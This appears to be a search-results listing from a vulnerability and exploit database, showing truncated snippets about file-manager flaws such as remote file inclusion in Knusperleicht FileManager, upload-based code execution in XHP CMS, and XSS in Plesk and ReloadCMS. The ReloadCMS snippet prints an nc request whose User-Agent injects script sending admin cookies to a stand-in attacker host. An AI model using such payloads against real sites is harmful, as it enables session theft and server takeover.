733 matches found
Code injection
Unspecified vulnerability in easy-content filemanager allows remote attackers to upload or modify arbitrary files via unspecified vectors...
CVE-2007-0252
Unspecified vulnerability in easy-content filemanager allows remote attackers to upload or modify arbitrary files via unspecified vectors...
CVE-2007-0252
Technical details (affected product/version, vectors, exploitability) are not provided in the supplied documents. Monitor for updates; no public details are available here.
Knusperleicht FileManager DWL_Download远程文件包含漏洞
Knusperleicht FileManager是一款基于PHP的音乐管理程序。 Knusperleicht FileManager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是脚本对用户提交的"dwldownloadpat"和"dwlincludepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Knusperleicht FileManager http://knusperleicht.at/index.php?knuspi=phpecke...
UNAK-CMS 1.5 - 'dirroot' Remote File Inclusion
============================================================================================== UNAK-CMS = v1.5 dirroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
filemanagerrem.txt
Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : FileManager Site : http://www.knusperleicht.at Code : $dwldownloadpath = "downloads"; $dwlincludepath = "dwl/";...
quickie.txt
Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...
CVE-2006-3987
Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...
CVE-2006-3987
Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...
CVE-2006-3987
The CVE-2006-3987 entries describe multiple PHP remote file inclusion vulnerabilities in Knusperleicht FileManager 1.2 and earlier. The issue arises in index.php where an attacker can supply a URL in the dwl_download_path or dwl_include_path parameters, enabling remote code execution. Connected d...
[Kurdish Security # 20 ] Quickie Remote Command Execution
Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...
plesk800.txt
Product: Plesk control panel Version: alert; Credits INVENT...
CVE-2006-3737
CVE-2006-3737 describes a cross-site scripting (XSS) vulnerability in the filemanager/filemanager.php component of the SWsoft Plesk control panel (version 8.0 and earlier). The issue arises when an authenticated user supplies a crafted file parameter, allowing injection of arbitrary web script or...
ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...
Design/Logic Flaw
Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...
CVE-2006-1371
Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...
CVE-2006-1371
CVE-2006-1371 affects XHP CMS
CVE-2006-1371
Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...
XHP CMS 0.5 - upload Remote Command Execution
XHP CMS 0.5 - upload Remote Command Execution !/usr/bin/php -q -d shortopentag=on 126 $re...
XHP CMS <= 0.5 (upload) Remote Command Execution Exploit
Exploit for unknown platform in category web applications ======================================================== XHP CMS = 0.5 upload Remote Command Execution Exploit ======================================================== !/usr/bin/php -q -d shortopentag=on ? echo "XHP CMS = 0.5 remote cmmnds...